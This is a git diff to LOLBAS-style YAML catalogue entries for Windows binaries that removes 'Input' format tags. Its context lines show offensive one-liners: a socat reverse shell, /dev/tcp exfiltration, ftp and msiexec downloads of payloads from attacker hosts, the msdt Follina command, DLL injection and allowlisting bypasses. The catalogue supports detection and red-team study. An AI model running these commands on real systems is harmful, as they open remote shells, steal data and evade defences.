diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 7f18846..7ff3145 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: .NetObjets - - Input: Fixed Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 2c1c1ed..1239772 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 7 or older Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 99c1efb..d8f5064 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 87d2963..ec33fe0 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -33,7 +31,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -43,7 +40,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 1698354..34b5c3f 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows Server 2022 Tags: - Execute: DLL - - Input: Custom Format - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 Description: Downloads text formatted files Usecase: Download scripts, webshells etc. diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 3a91d24..bccde85 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Custom Format - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: INF - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index c0b4972..3dca837 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: c:\windows\system32\conhost.exe Detection: diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index a9b8c99..a486458 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: control.exe c:\windows\tasks\evil.cpl Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 3f9d352..129672d 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 16dd0b0..7390b35 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index c52a3a6..ab8ca26 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: ClickOnce - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index a3ddba2..c54501f 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Input: Custom Format - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index f4db3af..613ce76 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index e3328c1..378d7c2 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -46,7 +46,6 @@ Commands: Privileges: Admin MitreID: T1003.003 OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server - Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index f488534..1c0e2ff 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 076343a..c75e30a 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 8b77196..a236872 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 5714d37..e4b38ed 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -27,7 +27,6 @@ Commands: OperatingSystem: Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 21ea0a6..6b4828b 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 0a5b355..3ac6adc 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Fixed Format - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index bc55c98..e861cd2 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -20,7 +20,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: HH.exe http://some.url/payload.chm Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe @@ -32,7 +31,6 @@ Commands: - Execute: CMD - Execute: CHM - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index ae5dd4a..80c6cc5 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Fixed Format Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index 9d5ddcc..056e30e 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 43ba954..3b659dd 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: Remote - Execute: .NetEXE - - Input: Custom Format - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -25,7 +24,6 @@ Commands: Tags: - Execute: Remote - Execute: .NetEXE - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 9d8c607..d0f129a 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index a5868ca..8a07010 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: .NetDLL - Execute: .NetEXE - - Input: Custom Format - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -25,7 +24,6 @@ Commands: Tags: - Execute: .NetDLL - Execute: .NetEXE - - Input: Custom Format - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index f89afc0..33e2aa7 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index a711f8e..5d76aca 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,7 +24,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -36,7 +34,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 0eb4ee9..7cbe41a 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 80a2fa5..da29e92 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Csharp - - Input: Custom Format - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Csharp - - Input: Custom Format - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -33,7 +31,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters @@ -43,7 +40,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Input: Custom Format - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections @@ -53,7 +49,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 54ba0b5..f8c829e 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msconfig.exe Code_Sample: diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 1b9649e..e681104 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -14,7 +14,6 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Input: Custom Format - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting @@ -25,7 +24,6 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Input: Custom Format - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -36,7 +34,6 @@ Commands: Tags: - Application: GUI - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index 96d6f82..d0cc16d 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -27,7 +27,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index a3d4fde..355b547 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: WSH - Execute: Remote - - Input: Custom Format - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index f58f027..92390c1 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - - Input: Custom Format - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server @@ -24,7 +23,6 @@ Commands: Tags: - Execute: MSI - Execute: Remote - - Input: Custom Format - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files @@ -35,7 +33,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -46,7 +43,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server @@ -56,7 +52,6 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe